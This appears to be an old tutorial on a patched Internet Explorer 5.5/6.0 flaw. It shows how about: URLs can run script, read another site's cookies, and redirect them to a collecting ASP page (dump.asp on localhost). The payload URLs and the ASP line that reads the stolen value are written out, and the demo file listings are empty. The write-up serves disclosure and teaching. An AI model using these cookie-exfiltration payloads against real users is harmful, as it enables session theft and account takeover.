IE Cookie Vulnerability

IE Cookie Vulnerability

1. Introduction

When using Microsoft's Internet Explorer 5.5 or 6.0 to visit a malicious web site, the web site can read cookies stored on the user's machine by other web sites. Microsoft has released a patch to fix this problem that is available at:

http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp

You can also get more details about this at: http://shiflett.org/

2. How Does It Work

2.1 Script in about:

Using the about: prefix in the URL, a URL can contain an executable script. For example:

    1. Type the following in the address bar of IE:

    2. about://<script%20language=javascript>alert('Vulnerable')</script>

    3. Push <Enter>

    4. A popup window will appear with the message: Vulnerable.

The above shows that we can execute a JavaScript directly in the URL.

2.2 Get The Cookie

The JavaScript can read the cookie for any web site we choose. For example, to read the cookie for yahoo.com:

about://www.yahoo.com/<script%20language=javascript>alert(document.cookie)</script>

which will show the yahoo cookie in a message box.

2.3 Redirect Cookie

Instead of showing the cookie, we can redirect to any other web site passing the cookie in the query string. For this test, assume the following:

    1. The web site to redirect to is http://localhost/

    2. The web site has the following ASP page: hackCookie/dump.asp

    3. The dump.asp page reads a request parameter named cookies

Using the above information, the URL will be:

about://www.yahoo.com/

<script%20language=javascript>

document.location=

'http://localhost/hackCookie/dump.asp?cookies='+document.cookie

</script>

(Note: Although the above URL appears in several lines, it should be entered as one line and without any line breaks.)

If we put the above URL in a page that the user will visit, the page can read the cookie and send it to any server.

2.4 Retrieve the Cookie's Data

When dump.asp page retrieves the cookie data, it can do whatever it chooses with it, for example saving it to a database for later processing. However, for this test, dump.asp will just display the value of the cookie in the user's browser.

To read the cookies request parameter in ASP:

cook= Request.querystring("cookies")

3. Demo

To demonstrate the whole process, I have created a demonstration that you can run on your server. It consists of two files:

    1. dump.asp: An ASP page that reads all its request's data and dump it back to the client.

    2. hack.html: Allows the tester to select what web site cookie he/she wants to send to dump.asp, then send the cookie's data.

To run it, you need to create an IIS folder named hackCookie and copy the above files into it.

The following snapshot shows how hack.html displays:

4. Listing

4.1 dump.asp

4.2 hack.html